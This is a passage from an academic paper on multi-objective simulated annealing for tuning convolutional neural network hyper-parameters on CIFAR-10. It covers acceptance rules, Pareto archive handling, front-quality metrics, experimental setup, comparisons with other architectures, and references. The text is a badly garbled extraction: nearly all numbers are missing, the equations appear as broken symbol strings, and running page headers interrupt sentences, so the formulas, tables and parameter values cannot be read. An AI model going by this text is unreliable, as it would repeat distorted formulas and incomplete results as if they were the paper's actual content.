solution x′ only if it is better than current solution x with respect to this single objective value. however, if x and x′ have the same error rate, then the sa selects the one with the smaller number of flops. the composite move used to generate x′ is defined in “local moves”. in order to define tinit, we use a real time initial temperature selection strategy (smith, everson & fieldsend, ). in this strategy, pacc is not calculated using the formula pacc ¼ min ; exp �df=tcurð Þf g. instead, a fixed initial probability value which is recommended as . is defined for accepting the worsening moves. then, tinit is calculated as � dfave= ln paccð Þð Þð Þ, where dfave is the average worsening penalty amount which is calculated executing a short “burn-in” period. a similar real time temperature adjustment approach is also used to define tfinal. in this study, the total iteration budget defines the sa stopping criterion, and the number of inner and outer iterations are defined according to this iteration budget and the cooling scheme. mosa algorithm there are many types of mosa algorithms in the literature, and basically, there are two main differences between multi-objective and single-objective sa algorithms. the first difference is the design of the acceptance rule, and second one is the maintenance of an external archive of non-dominated solutions which will eventually yield an approximation of the pareto front. let zk xð Þ for k ; ; ::; kf g be the value of the kth objective function of a solution x. if a new solution x yields in objective function values that are superior to x in terms of all of the objectives; that is, dzk ¼ zk x ð Þ� zk xð Þ algorithm sa init sa params tinit; nbr out iter; nbr inner iterð Þ tcur tinit for counter to nbr out iter do for inner counter to nbr inner iter do x selectfromneighbor xð Þ if df ¼ f x ð Þ�f xð Þð Þ� then x x else if prnd � exp �df=tcurð Þthen x x else continue with x end end tcur tcur�cool ratio end gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and dzk � ; k ; f g assuming the two objectives are to be minimized, then it is always accepted. otherwise, probabilistic acceptance rules as discussed in “sa algorithm”. are used, but before this, multiple objective values should be combined into a single objective value. there are several approaches to combine all objective function values into a single value. (ulungu et al., ) use a criterion scalarizing function which takes the weighted sum of the objective functions. czyzżak & jaszkiewicz ( ) use a diversified set of weights to obtain a diverse set of solutions in the final front in their sa-based algorithm which they call pareto simulated annealing (psa). suppapitnarm et al. ( ) propose another mosa, which they call smosa that suggests maintaining different temperatures, one for each objective. in the study a “return-to-base” strategy which restarts the search from a random archive solution is introduced. in dominance-based acceptance rules, x and x are compared with respect to the dominance relation. x is said to dominate x which is denoted as x � x ,if it is better than x in at least one objective and it is not worse than x in all of the other objectives. if at any iteration, x � x then, x is accepted with a probability which is also computed according to the domination status of the solutions. suman ( ) proposes a pareto domination-based mosa which uses the algorithm mosa init mosa params tinit; nbr out iter; nbr inner iterð Þ tcur tinit for counter to nbr out iter do for inner counter to nbr inner iter do x selectfromneighbor xð Þ if x � x // current dominates new then if prnd � exp �df=tcurð Þthen x x else if x � a; a a then // an archive solution is dominated by new x x updatearchive x ð Þ elseif a � x ; a a then == an archive solution dominates new a� selectrandomarchivesolutionðÞ x select a�; x ; xð Þ == ða � and x Þ or ða� and xÞ competes else ==new does not dominate or is not dominated by any archive solution x x updatearchive x ð Þ end end tcur tcur�cool ratio end gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ current domination status of a solution to compute its acceptance probability. the acceptance probability of a solution is determined by the number of solutions in the current front dominating it. bandyopadhyay et al. ( ) proposes archive-based multi-objective simulated annealing (amosa) which again uses a dominance-based acceptance rule. a detailed survey on single-objective and multi-objective sa can be found in suman & kumar ( ). the mosa algorithm proposed in this study iterates in a similar fashion as the single-objective sa algorithm. however, there are now two objective values to take into consideration while moving from x to x , where the first objective being the number of flops required by the network, and the second being the error rate achieved by the network. criterion scalarizing rules can be used to combine the two objective values into one, but this method requires both objective values to be in the same scale and proper weights to be defined for each objective. on the other hand, probability scalarizing rules calculate the acceptance probability of x for each objective individually, then a decision rule is applied to aggregate these probabilities such as taking the minimum, maximum or the product of these probabilities. as different probabilities are evaluated for each objective, a different temperature should be maintained for each objective in this approach. due to the difficulties mentioned above, we adopt the smith’s pareto dominance rule (smith et al., ) in our mosa algorithm. starting from the first iteration, all non-dominated solutions encountered during the search are collected in an external archive, a, which is updated whenever a new solution is accepted. the state of a is expected to improve as the algorithm iterates, and archive solutions in the final iteration form the pareto front which is presented to the decision maker. as shown in the mosa pseudo-code below, as the algorithm iterates from x to x , if x � x (x dominates x ), then x is accepted based on smith’s pareto dominance rule which calculates the acceptance probability of a given solution by comparing it with the current archive which contains potentially pareto-optimal set of solutions. smith’s rule uses a difference in the energy level, df, to compare two solutions with respect to all objectives as follows: let a denote the current potentially pareto optimal set and ~a denote the union of this set and two competing solutions, ~a ¼ a[x [x , then df ¼f = ~a �� ��g � f x ð Þj j� f xð Þj jf g, where f xð Þ denotes the solutions in a that dominate x plus . the probability of accepting x is then computed as pacc ¼ exp �df=tcurð Þ, where the only difference with a single-objective version is the calculation of df. in this approach, only one temperature is maintained regardless of the number of objectives. in a multi-objective version of sa algorithm, archive maintenance related rules should also be defined. if x �x (x does not dominate x ), then x becomes a candidate for being a member of the archive. this is determined as follows: if x dominates any solution in a, then x is accepted and the archive is updated by inserting x and removing all the solutions dominated by it. if x �x but there is a solution a a dominating x , then no archive update is performed and the current iteration is completed either by accepting x , a or x as the current solution. if x � x, then a and x compete for being selected as the current solution according to the probability calculated with the same rule described above. here, a represents a random gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ archive solution dominating x . continuing the search process with a previously visited archive solution is known as return-to-base strategy. if x �x and x �x, then first these two solutions compete, and then the winning solution competes with a according to the same probabilistic acceptance rule. if x �x and there is no solution a a that dominates x , and x does not dominate any solution a a, then x is accepted and inserted into the archive. as the archive is updated by removing all dominated solutions, the size of the archive does not grow very large. selection of other mosa parameters such as tinit, tfinal, cooling rate and also the number of inner and outer iterations are given in detail in section “mosa parameter tuning”. performance evaluation criteria in multi-objective optimization problems, final fronts are evaluated according to two performance criteria: (i) closeness to the pareto-optimal front and, (ii) diversity of the solutions along the front (zitzler, deb & thiele, ; deb, ). generational distance (gd) is the most-widely used metric to examine the closeness of the final front to pareto-optimal front (van veldhuizen & lamont, ). in order to measure the diversity which is comprised of two components, namely distribution and spread, two metrics, spacing and maximum spread are used. spacing evaluates the relative distance among the solutions, whereas spread evaluates the range of the objective function values. gd metric requires a pareto-optimal front in order to compare any two fronts. since this optimal front is not known in advance, it is approximated by an aggregate front, a�, which is formed by combining all solutions in the two fronts. then, the amount of improvement achieved in each front is measured with respect to this aggregate front. gd for a given front is calculated as given in eq. ( ), where di is the euclidean distance between the solution i a and the closest solution k a�. in eq. ( ), pmax and emax denote the maximum objective values, whereas p� and e� denote the minimum objective function values observed in a�. for this gd metric, smaller the better. gd að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffip i a d i p aj j ( ) di ¼ min k a� ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi pi �pk pmax �p� � � þ ei �ek emax �e� � � !vuut ( ) zitzler’s spread metric which is computed as in eq. ( ) is used to measure the extent of the fronts. this metric simply calculates euclidean distance between the extreme solutions in a given front. if a front a includes all the extreme solutions in a�, then this front takes a value of according to this metric. s að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi max i a pi �min i a pi pmax �p� ! þ max i a ei �min i a ei emax �e� ! @ a vuuut ( ) gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ spacing metric (schott, ) is used to measure the diversity along a given front. for each solution, distance to its closest neighbor is calculated as shown in eq. ( ). then, the spacing metric is calculated as the standard deviation of these distances as shown in eq. ( ), where �d is the average distance value. if the distance between the closest solutions are distributed equally, then the value of this metric approaches to zero which is the desired condition. di ¼ min k a^k ¼i pi �pkj j max j a pj �min j a pj þ ei �ekj j max j a ej �min j a ej @ a; for i a ( ) sp að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi aj j x i a di � �d � � s ( ) results implementation details solution representation and the search space solutions can be represented with either block (ma et al., ) or layer structure (yamasaki, honma & aizawa, ; sun et al., b). in this study, we adopted the block structure with variable length representation; where the solutions are allowed to expand or shrink dynamically. a new solution is generated by repeating a certain number of convolution and fully connected blocks. a convolution block is composed of a convolution layer (conv), activation function (act), batch normalization (bn), subsampling method (subs) and a dropout function (drop). a fully connected block is composed of a fully connected layer (fc), activation function, batch normalization and a dropout function. this structure can be represented as: conv ! act ! bnð Þ�nc !½ subs ! dropð Þ� �ncb ! fc ! act ! bn ! dropð Þ½ � �nfb, where #conv denotes the number of number of convolution layers in a convolution block, ncb denotes the number of convolution blocks, and nfb denotes and the number of fully connected blocks. we adopted the same dictionary structure given in (ma et al., ) to represent a solution which is given below: conv : ks; kc; p; s; af g#convn¼ ; pool : ksp; sp; pt; dp � � ncb m¼ þ uf ; df ; af � nfb k¼ n o we adopted the same hyper-parameters as in (gülcü & kuş, ), and the full name of the hyper-parameters whose abbreviations are given in the dictionary representation are given in table along with their type and value ranges. an example solution that uses the dictionary representation is given below (please refer to table for the abbreviations): {{ncb: , nfb: }, {"conv_block_ ": {"conv" : {#conv: , ks: , kc: , p: same, s : , a: relu}, "pool" : {ksp: , sp: , pt: max, dp . }}, "conv_block_ " : {"conv" : {#conv: , ks: , kc: , p: same, s : , a: relu}, "pool" : {ksp: , sp: , pt: max, dp: . }}} + "fully_block_ " : {uf: , df: . , af: relu}}. gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ local moves mosa algorithm starts by taking vggnet (simonyan & zisserman, ) as the initial solution, and at any iteration, a new solution is created from the current solution by modifying the convolution and fully connected block hyper-parameters as follows: step : add a new convolution block with a probability p which takes a value of . initially, and increases by . times at every iterations. a newly added block inherits all the hyper-parameters from the preceding block. step : select the subsampling method, pooling or strive, with equal probabilities. step : start from the first convolution block, modify each block as follows: if #conv < maximum allowed layer count, then, add a new convolution layer with a p of . ; otherwise, delete the last convolution layer with a p of . modify the convolution layer hyper-parameters with a p of . . if it is decided to be modified, then only one hyper-parameter which is selected randomly is modified. since the same layer hyper-parameters are used within the same block (as in the vggnet architecture), this selection affects all the layers in that block. step : add a new fully connected block in a similar fashion to adding a new convolution block. table hyper-parameters to be optimized, their value types and ranges. hyper-parameter abbreviation value types value ranges convolution (conv) filter size ks numeric , , filter count kc numeric , , , , , , , padding p categorical same** stride s numeric ** activation function f categorical relu, leaky-relu, elu subsampling method – categorical pooling, strive pooling (pool)* filter size ksp numeric , stride sp numeric ** type pt categorical max, avg dropout rate dp numeric . , . , . strive* strive filter size kss numeric , padding ps categorical valid** stride ss numeric ** fully connected number of units uf numeric , , dropout rate df numeric . , . , . activation function af categorical relu, leaky-relu, elu #convolutional layers #conv numeric , , #convolutional blocks ncb numeric , #fully connected layers nfb numeric , notes: * conditioned on subsampling method. ** fixed values. gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ step : start from the first fully connected block, modify only one random hyper- parameter with a p of . as in the convolution block. we have observed during the preliminary experiments that the approach of adding a new convolution block with an initial probability of . , and increasing this probability by . times at every iterations, enabled the search reach -block networks around iteration number . with this approach, the probability of adding a new block is increased to . at the end of the th iteration; and at the end of th iteration, it became . allowing the network to grow with roughly % probability. if we had kept this probability constant, -block networks would have been explored for only a few iterations towards the end of the search process. experimental setup mosa parameter tuning in our study, the mosa algorithm adopts a real time initial temperature selection strategy in which the worsening moves are accepted with an initial probability, pacc, of . . tinit is then calculated as tinit ¼� dfave= ln paccð Þð Þð Þ. average initial worsening penalty amount, dfave, is approximated executing a short “burn-in” period in which worsening moves as well as improving ones are all accepted. we run a burn-in period with iterations and of them resulted in worsening solutions. in table , some information regarding only a few of those iterations are given. in the table, f xð Þ denotes the solutions in a that dominate x plus , aj j denotes the size of the archive, f x ð Þ�f xð Þ denotes the worsening amount in terms of domination count and df denotes the objective value calculated as df ¼f = ~a �� ��g � f x ð Þj j� f xð Þj jf g, where ~a�� �� equals aj jþ . the average aj jvalue obtained in this burn-in period is used to calculate dfave. this period results in a dfave value of . which also gives a tinit value of . . we adopt a similar temperature adjustment approach to determine tfinal value, where in this case we assumed a f x ð Þ�f xð Þ value of at most to be accepted with the same probability. in order to calculate tfinal, final front size needs to be approximated, and a value of for the final front size seemed to be reasonable according to preliminary experiments, and tfinal is calculated as . . in this study, the mosa algorithm is allowed to run for a number of iterations defined by the iteration budget of , which means that at most solutions are created during a single run. the amount of this total iteration budget to be allocated in outer and inner iterations is determined by the cooling rate parameter. we tested for several cooling rate values keeping the total number of iterations at due to large computational times. table shows the number of outer and inner iterations calculated for different cooling rate values under the same budget and temperature values. based on these iteration numbers, we selected cooling rate values of . , . and . for the parameter tuning process. we allowed the mosa algorithm run for times for each of those cooling rate values using different random number seeds. the fronts obtained under each cooling rate value for three runs are given in fig. . as can be seen in the figure, three pareto fronts are obtained for each cooling rate value. although one can notice that there is no difference among the fronts formed with different cooling rate values visually, we applied gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kruskal–wallis h-test to determine whether there are significant differences. this test is applied separately for gd, spread and the front size metrics, but none of those metrics proved a significant difference among the fronts. therefore, we selected a cooling rate of . arbitrarily. cifar dataset in this study, cifar- dataset (krizhevsky & hinton, ) which is the most widely- used natural object classification benchmark dataset used in hpo and nas studies is selected as the benchmark dataset. considering the computational cost and the hardware requirement to run the experiments, the selected dataset should be simple, yet complex enough to reveal the differences among different methods or the network configurations. many studies consider this dataset as the only benchmark dataset (lu et al., a; wang et al., ; elsken, metzen & hutter, ) due to the fact that it is simpler than very large-scale imagenet dataset (russakovsky et al., ), but still difficult enough to be used to evaluate the performance of different approaches. cifar- dataset consists of , × color images in classes, and each class contains , images. the whole dataset is divided into training and test datasets of , and , images, respectively. in most of the studies, cifar- original training set is split into two sets ( – %) to create training and validation sets which are used during the search process. we follow a similar approach with only difference is that, only half of the original training dataset is used during a mosa search process. in order to speed up the search process, a reduced sample of % of the original training samples are table the number of outer and inner iterations calculated for different cooling rate values under the same budget and temperature values. iteration budget tinit tfinal cooling rate #outer iterations #inner iterations . . . . . . . . . . . . . . . . . . . . . . . . . table worsening moves encountered during burn-in period. iteration no f(x) f(x′) |a| f(x′)–f(x) Δf . . . . . ⋮ ⋮ ⋮ ⋮ ⋮ ⋮ average . . . . . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ selected randomly; and % of this reduced sample is used as the reduced validation set. although this approach might have some negative effects on the performance evaluation of a given configuration; we believe this effect is minimal due to the fact that the aim of the search process is not to accurately measure the error rate of a configuration, but to perform a fair comparison to discriminate good and bad configurations. the original cifar- test set is never used during the mosa search process, and it is only used to obtain the actual test accuracy values of the selected configurations on the final trade-off front. other image classification datasets such as mnist (lecun et al., ), fashionmnist (xiao, rasul & vollgraf, ) and emnist-balanced (cohen et al., ) are being criticized for having reached their limits and failing to reveal the differences between the algorithms (lu et al., a). training and evaluation during the search process during the search process, the classification performance of a generated network configuration is approximated by following the early stopping approach. early stopping is used as a popular method to prevent over-fitting in classical machine learning; however, in figure comparison of mosa fronts under different cooling rates with (a) random seed: , (b) random seed: , (c) random seed: . full-size doi: . /peerj-cs. /fig- gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the context of automl, and in particular for hpo, it is usually used to cut down the training time for unpromising configurations. based on the evaluations on the validation set, if a poor early-stage performance is observed, then the training process is terminated, and the search moves to a new configuration. this approach not only cuts down total running time of the hpo method, but also introduces noise and bias to the estimation, as some configurations with bad early-stage performance may eventually turn out to be good after sufficient training (yao et al., ). at each mosa iteration, a newly generated configuration is trained using the training split of the original training set and it is evaluated on the validation set which is the test split of the original training set. xavier weight initializer and adam optimizer with a learning rate of . is used, and the batch size is selected as . for a given configuration, if the best loss achieved on the validation set is not improved after three consecutive epochs, then the training process is terminated. a configuration is allowed to be trained at most epochs. in a mosa run with iterations, we observe that the average number of epochs is . . this epoch count seems to be reasonable considering the epoch count used in similar studies: minimum of epochs in (lu et al., a) and epochs in elsken, metzen & hutter ( ). all experiments are performed on a single nvidia ti gpu using keras (chollet et al., ), and the code and the raw evaluation results are available at https://github.com/zekikus/mosa-cnn-hyperparams-optimization. training after the search process the mosa algorithm is run for iterations, and each run is repeated for three times using different random seeds. from each of three trade-off fronts, some non-dominated configurations are selected and then trained for longer epochs on the original cifar- training dataset in order to measure their actual classification performance. from each front, three configurations with the lowest error rates are selected and each solution is trained for epochs with a batch size of using standard stochastic gradient descent (sgd) back-propagation algorithm with the following parameter values: learning rate = . , decay = e− and momentum = . (default values in keras). as mentioned earlier, the original test set is never used during training; it is only used at this stage to test the performance of the selected networks. to improve the test performance, we only utilized an online augmentation routine that is used in many peer studies. this process which is also called augmentation on the fly is especially preferred for larger datasets where an increase in size cannot be afforded. sequential transformations of padding, random crop and horizontal flip are applied on the mini- batches during training (he et al., ; huang et al., ). in some studies, training performance is further improved by some additional operations. for example, (lu et al., b) appends an auxiliary head classifier to the architecture, but we did not follow these approaches that require manual intervention after the search process. results analysis we first present the objective space distribution of all configurations obtained during each independent run of the mosa. in order to show the search ability of the proposed gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/zekikus/mosa-cnn-hyperparams-optimization http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm, the mosa search space is compared to the search space generated by the single-objective sa method also to the search space generated by random search (rs) method in which all solutions are accepted regardless of their objective values. final fronts are also compared in terms of the front metrics given in “performance evaluation criteria”. then, some solutions in the final front are selected to be trained for longer epochs in order to perform post search analysis. the configurations generated by the mosa are compared to both human designed state-of-the-art configurations and the configurations generated by other search methods like evolutionary algorithms in terms of the test error, the number of flops, the number of parameters and also the search cost which is reported as gpu-days. fronts analysis a mosa search is repeated three times with different initial random seeds, and the objective space distribution of all configurations encountered during each of those search processes are illustrated in fig. . in all of those runs, sa especially focuses on the areas with small classification error but with large number of flops, es expected. in order to show the search ability of the mosa over the sa, we compare the final fronts generated by each method in terms of closeness to the pareto-optimal front and the diversity of the figure comparison of mosa and sa search ability in terms of objective space distribution and the pareto fronts with (a) random seed: , (b) random seed: , (c) random seed: . full-size doi: . /peerj-cs. /fig- gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ solutions along the fronts. the configurations generated by the sa seem to be much complex than the configurations generated by the mosa which also takes into account the complexity as the other objective. due to the large computational time requirement (at least × longer), sa is run only once. as there is no archive mechanism in the sa, the final sa front is formed by selecting all non-dominated configurations encountered during a single run. the mosa and the sa fronts are also shown in fig. along with the objective space distributions of those algorithms. in addition to making comparison using graphical plots, we used the metrics given in “performance evaluation criteria” to compare the fronts generated by each approach in a quantitative manner. these metrics are as follows: generational distance (gd), spread (s) and spacing (sp) metrics. the comparison results using these metrics are given in table . in the table, mosa_ represents the mosa front obtained at the first run, and mosa_ represents the mosa front obtained at the second run and so on. gd of each front is calculated with respect to a� which is formed by combining all four fronts. s of each front is calculated with respect to the extreme points considering again all four fronts. sp metric is calculated for each front separately, because it measures within front distribution quality of a given front. the search ability of the proposed method is also validated by comparing it to the rs method. the same comparisons performed between the mosa and the sa are applied to compare the mosa and the rs methods. when the mosa and the rs solutions are combined to create a�, none of the rs front solutions take place in a� as in the case of sa. a� is composed of only the solutions coming from the mosa which means that gd calculations are made against the same reference front; therefore we decided to present all these comparison results on the same table, table . figure illustrates the objective space distribution and the fronts obtained by the mosa and the rs methods. after search analysis in order to measure the actual classification performance of the configurations generated by the mosa method, nine configurations are selected and subjected to longer training using the original cifar- training dataset as detailed in “training after the search process”. among these nine configurations, the networks with the lowest error rates are selected for comparison with the networks reported in the literature. as the mosa algorithm considers two objectives, namely, error rate and the flops, during the search process, a multi-objective comparison with respect to the front evaluation metrics should be performed for a fair comparison. unfortunately, most of the studies do not table evaluation of the final fronts with respect to three metrics and the number of solutions. mosa_ mosa_ mosa_ sa rs gd . . . . . s (spread) . . . . . sp (spacing) . . . . . #solutions gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ report the objective values of the solutions in the final frontiers, or they consider different objective functions to estimate the complexity of the generated networks. in some studies, computational complexity is measured as computational time in gpu-days. however, a comparison with respect to computational time may not be reliable due to some external factors such as the temperature in the computing environment, even if the same gpu models are used for the experiments. therefore, the number of flops that a network carries out during a forward pass is the most reliable complexity measure. in table , the final performance of three mosa configurations in terms of both objectives are presented. in addition, a graphical comparison is given in fig. where the dominance relation between different configurations can be easily noticed. as in “fronts analysis”, a comparison to the configurations found with the single objective sa algorithm is also performed and the results are presented in the table in order to show the effect of using a multi-objective solution approach for this bi-objective optimization problem. from the sa trade-off front, three configurations with the lowest error rate are selected for longer training, and the performance of each configuration is reported in the table. the same approach is followed for the rs, as well. other search generated architectures are included in the second part of the table. in the table, the accuracy, the number of flops and the number of parameters columns all represent the values reported in the figure visual comparison of mosa and rs search ability in terms of objective space distribution and the pareto fronts with (a) random seed: , (b) random seed: , (c) random seed: . full-size doi: . /peerj-cs. /fig- gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ original papers. as stated before, we did not consider the search cost in terms of time in the comparisons; however, in order to give an idea about the search cost of the mosa algorithm, we run one mosa search on the same gpu as in nsga-net (lu et al., a). we observe that mosa takes hours on a single nvidia ti gpu, which equals to . gpu-days, whereas it takes gpu-days for nsga-net. a comparison of the mosa configurations to the human designed state-of-the-art configurations are also performed. in order to be able to make a fair comparison, especially table comparison of mosa architectures to other search generated architectures. architecture search method test accuracy (%) flops (m) parameters (m) mosa_soln mosa . . . mosa_soln mosa . . . mosa_soln mosa . . . sa_soln sa . . . sa_soln sa . . . sa_soln sa . . . rs_soln rs . . . rs_soln rs . . . rs_soln rs . . . nsga-net (lu et al., b) ea . . ppp-net (dong et al., ) ea . . amoebanet-a + cutout (real et al., ) ea . . nasnet-a + cutout (zoph et al., ) rl . . figure comparison of the final performance of the networks in terms of both the error rate and the number of flops. full-size doi: . /peerj-cs. /fig- gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in terms of test accuracy, each of these state-of the-art architectures are rebuilt and trained using the same augmentation techniques as in the mosa training process. the results are presented in table . discussion the mosa and the sa algorithms are allowed to run for the same number of iterations. an archive is maintained to collect all non-dominated solutions that have been encountered throughout the search process. the mosa also incorporates a return-to-base strategy which allows further exploitation of the archive solutions. moreover, it uses a dominance-based acceptance rule as the decision criterion. cifar- dataset which is the most widely-used natural object classification benchmark dataset is used to compare the performance of different approaches. we first compare the search ability of the mosa and the sa algorithms using the trade-off fronts obtained by each method. objective space distribution of all configurations encountered during a sa search process is used to form the trade-off front consisting of only non-dominated solutions. the mosa and the sa fronts are then compared with respect to three multi-objective evaluation metrics. according to the results based on generational distance, spread and spacing metrics, the mosa algorithm is able to generate better fronts than the sa method. when the objective space distribution of the two methods are compared visually, one can see that the single-objective sa focuses on the objective space with small error rates regardless of the number of flops, as expected. on the other hand, the mosa focuses on the objective space with both small error rates and small number of flops. when the two algorithms are compared in terms of font cardinality, one can see that the mosa is able generate more solutions. when the mosa fronts are compared to the rs front, it is observed that each of three mosa front yields in better spread value than the rs front. but for other metrics, while the best value is always achieved by a mosa front, the rs yields in competitive results. as this front analysis is important in terms of providing some indications about the search ability of the algorithms, a more reliable comparison can be made after training the solutions in the trade-off front for longer epochs in order to get their accuracy on the original test set. however, due to the computational cost of this training process, only the selected solutions are allowed to run for longer training epochs. when the mosa and the sa configurations are compared after this long training process, table comparison of mosa architectures to human designed state of the art architectures. architecture test accuracy (%) flops (m) parameters (m) mosa_soln . . . mosa_soln . . . mosa_soln . . . lenet- (lecun et al., ) . . . vggnet- (simonyan & zisserman, ) . . . resnet- (he et al., ) . . . densenet- (huang et al., ) . . . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the results show that the sa performs slightly better than the mosa under single-objective setting. however, when the complexity in terms of both flops count and the number of parameters is considered, the mosa solutions are superior to sa solutions. when it comes to comparison to the rs solutions, the results suggest that all rs solutions are dominated by at least one mosa solution. the mosa configurations are also compared to the configurations obtained by other search methods like evolutionary algorithms and reinforcement learning methods. although the results might suggest a poor mosa performance in terms of test accuracy, the other objective, flops, should also be taken into account for a fair comparison. moreover, most of these approaches include complex augmentation strategies in order to boost the final test accuracy. when both the test accuracy and the complexity are considered, it is shown that the mosa configurations are not dominated by any of those architectures, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. it can also be concluded the mosa which is a single-stage algorithm is able to generate high quality solutions under limited computational resources. conclusions in this study, we model a cnn hyper-parameter optimization problem as bi-objective optimization problem considering two competing objectives, namely, the classification accuracy and the computational complexity which is measured in terms of the number of floating point operations. for this bi-criteria hyper-parameter optimization problem, we develop a mosa algorithm with the aim of obtaining high-quality configurations in terms of both objectives. cifar- is selected as the benchmark dataset, and the mosa trade-off fronts obtained for this dataset are compared to the fronts generated by a single-objective sa algorithm with respect to three front evaluation metrics. the results show that the mosa algorithm is able to search the objective space more effectively than the sa method. some non-dominated solutions generated by both the mosa and the sa search processes are selected for longer training in order to obtain their actual accuracy values on the original test set. the results again suggest that the mosa performs better than sa under bi-objective setting. the mosa configurations also compared to the configurations obtained by other search methods like population-based algorithms and reinforcement learning methods. it can be concluded that the mosa which is a single stage algorithm is able to generate high quality solutions under limited computational resources, and it can be of great use when the computational complexity and time are as important as the accuracy. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions ayla gülcü conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. zeki kuş conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code and raw results are available at github: https://github.com/zekikus/mosa-cnn- hyperparams-optimization. references back t. . evolutionary algorithms in theory and practice: evolution strategies, evolutionary programming, genetic algorithms (first press). new york: oxford university press. bandyopadhyay s, saha s, maulik u, deb k. . a simulated annealing-based multiobjective optimization algorithm: amosa. ieee transactions on evolutionary computation ( ): – . bergstra j, bengio y. . random search for hyper-parameter optimization. journal of machine learning research : – . chollet f, others. . keras. github. available at https://github.com/fchollet/keras. cohen g, afshar s, tapson j, van schaik a. . emnist: extending mnist to handwritten letters. in: international joint conference on neural networks (ijcnn). piscataway: ieee, – . czyzżak p, jaszkiewicz a. . pareto simulated annealing—a metaheuristic technique for multiple-objective combinatorial optimization. journal of multi-criteria decision analysis ( ): – doi . /(sici) - ( ) : < ::aid-mcda > . .co; - . deb k. . multi-objective optimization using evolutionary algorithms. vol. . hoboken: john wiley & sons. dong jd, cheng ac, juan dc, wei w, sun m. . ppp-net: platform-aware progressive search for pareto-optimal neural architectures. in: iclr workshop ( ). available at https://openreview.net/pdf?id=b nt taim. eberhart r, kennedy j. . particle swarm optimization. in: proceedings of the ieee international conference on neural networks. vol. . piscataway: ieee, – . elsken t, metzen jh, hutter f. . efficient multi-objective neural architecture search via lamarckian evolution. arxiv arxiv: . . elsken t, metzen jh, hutter f. . neural architecture search: a survey. arxiv arxiv: . . feurer m, hutter f. . hyperparameter optimization. in: automated machine learning. cham: springer, – . goodfellow i, bengio y, courville a. . deep learning. vol. . cambridge: mit press. gülcü a, kuş z. . hyper-parameter selection in convolutional neural networks using microcanonical optimization algorithm. ieee access : – doi . /access. . . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/zekikus/mosa-cnn-hyperparams-optimization https://github.com/zekikus/mosa-cnn-hyperparams-optimization https://github.com/fchollet/keras http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-mcda % e . .co; - https://openreview.net/pdf?id=b nt taim http://dx.doi.org/ . /access. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ he k, zhang x, ren s, sun j. . deep residual learning for image recognition. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . hoffman mw, shahriari b. . modular mechanisms for bayesian optimization. in: proceedings nips workshop bayesian optimization. – . holland jh. . genetic algorithms. scientific american ( ): – doi . /scientificamerican - . huang g, liu z, van der maaten l, weinberger kq. . densely connected convolutional networks. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . kim yh, reddy b, yun s, seo c. . nemo: neuro-evolution with multiobjective optimization of deep neural network for speed and accuracy. in: jmlr: workshop and conference proceedings. vol. . – . kirkpatrick s, gelatt cd, vecchi mp. 